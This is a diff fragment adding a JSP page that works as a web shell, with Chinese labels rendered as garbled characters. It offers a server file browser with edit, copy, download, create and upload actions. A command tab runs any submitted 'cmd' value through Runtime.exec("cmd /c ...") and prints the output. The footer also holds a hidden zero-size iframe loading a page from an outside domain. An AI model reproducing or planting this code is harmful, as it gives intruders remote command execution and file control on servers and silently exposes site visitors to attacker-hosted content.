+<p>&nbsp;&nbsp;&nbsp; 2004.09.20&nbsp; ��һ��jsp&nbsp;�����������򵥵���ʾĿ¼�ļ���С����</p>
+<p>&nbsp;</p>
+<p>&nbsp;</p>
+</div>
+
+
+<div id="menu1" class="tabcontent">
+<%
+out.println("<table border='1' width='100%' bgcolor='#FBFFC6' cellspacing=0 cellpadding=5 bordercolorlight=#000000 bordercolordark=#FFFFFF><tr><td width='30%'>"+strCurrentFolder[languageNo]+"�� <b>"+strDir+"</b></td><td>" + getDrivers() + "</td></tr></table><br>\r\n");
+%>
+<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
+       
+        <tr> 
+          <td width="25%" align="center" valign="top"> 
+              <table width="98%" border="0" cellspacing="0" cellpadding="3">
+     <%=sbFolder%>
+                </tr>                 
+              </table>
+          </td>
+          <td width="81%" align="left" valign="top">
+ 
+ <%
+ if(strAction!=null && strAction.equals("edit"))
+ {
+  out.println(sbEdit.toString());
+ }
+ else if(strAction!=null && strAction.equals("copy"))
+ {
+  out.println(sbCopy.toString());
+ }
+ else if(strAction!=null && strAction.equals("down"))
+ {
+  out.println(sbDown.toString());
+ }
+ else if(strAction!=null && strAction.equals("savecopy"))
+ {
+  out.println(sbSaveCopy.toString());
+ }
+ else if(strAction!=null && strAction.equals("newFile") && !sbNewFile.toString().equals(""))
+ {
+  out.println(sbNewFile.toString());
+ }
+ else
+ {
+ %>
+  <span id="EditBox"><table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF" bgcolor="white" >
+              <tr bgcolor="#E7e7e6"> 
+                <td width="26%"><%=strFileName[languageNo]%></td>
+                <td width="19%"><%=strFileSize[languageNo]%></td>
+                <td width="29%"><%=strLastModified[languageNo]%></td>
+                <td width="26%"><%=strFileOperation[languageNo]%></td>
+              </tr>              
+            <%=sbFile%>
+             <!-- <tr align="center"> 
+                <td colspan="4"><br>
+                  �ܼ��ļ�������<font color="#FF0000">30</font> ����С��<font color="#FF0000">664.9</font> 
+                  KB </td>
+              </tr>
+    -->
+            </table>
+   </span>
+ <%
+ }  
+ %>
+
+          </td>
+        </tr>
+
+ <form name="frmMake" action="" method="post">
+ <tr><td colspan=2 bgcolor=#FBFFC6>
+ <input type="hidden" name="action" value="newFile">
+ <input type="hidden" name="path" value="<%=strDir%>">
+ <input type="hidden" name="file" value="<%=strFile%>">
+ <input type="hidden" name="cmd" value="<%=strCmd%>">
+ <input type="hidden" name="tabID" value="1">
+ <input type="hidden" name="content" value="">
+ <%
+ if(!strDir.endsWith("\\"))
+ strDir = strDir + "\\";
+ %>
+ <input type="text" name="fileName" size=36 value="<%=strDir%>">
+ <input type="submit" name="btnNewFile" value="�½��ļ�" onclick="frmMake.submit()" > 
+ <input type="submit" name="btnNewDir" value="�½�Ŀ¼"  onclick="frmMake.submit()" > 
+ </form>  
+ <form name="frmUpload" enctype="multipart/form-data" action="" method="post">
+ <input type="hidden" name="action" value="upload">
+ <input type="hidden" name="path" value="<%=strDir%>">
+ <input type="hidden" name="file" value="<%=strFile%>">
+ <input type="hidden" name="cmd" value="<%=strCmd%>">
+ <input type="hidden" name="tabID" value="1">
+ <input type="hidden" name="content" value="">
+ <input type="file" name="cqqUploadFile" size="36">
+ <input type="submit" name="submit" value="�ϴ�">
+ </td></tr></form>
+      </table>
+</div>
+<div id="menu2" class="tabcontent">
+
+<%
+String line="";
+StringBuffer sbCmd=new StringBuffer("");
+
+if(strCmd!=null) 
+{
+ try
+ {
+  //out.println(strCmd);
+  Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
+  BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
+  while((line=br.readLine())!=null)
+  {
+   sbCmd.append(line+"\r\n");  
+  }    
+ }
+ catch(Exception e)
+ {
+  System.out.println(e.toString());
+ }
+}
+else
+{
+ strCmd = "set";
+}
+
+%>
+<form name="cmd" action="" method="post">
+&nbsp;
+<input type="text" name="cmd" value="<%=strCmd%>" size=50>
+<input type="hidden" name="tabID" value="2">
+<input type=submit name=submit value="<%=strExecute[languageNo]%>">
+</form>
+<%
+if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
+{
+%>
+&nbsp;<TEXTAREA NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></TEXTAREA>
+<br>&nbsp;
+<%
+}
+%>
+</DIV>
+</div>
+<br><br>
+<center><a href="http://www.7jyewu.cn" target="_blank">www.7jyewu.cn</a> ,All Rights Reserved.
+<br>Any question, please email me admin@syue.com
+<iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe>
\ No newline at end of file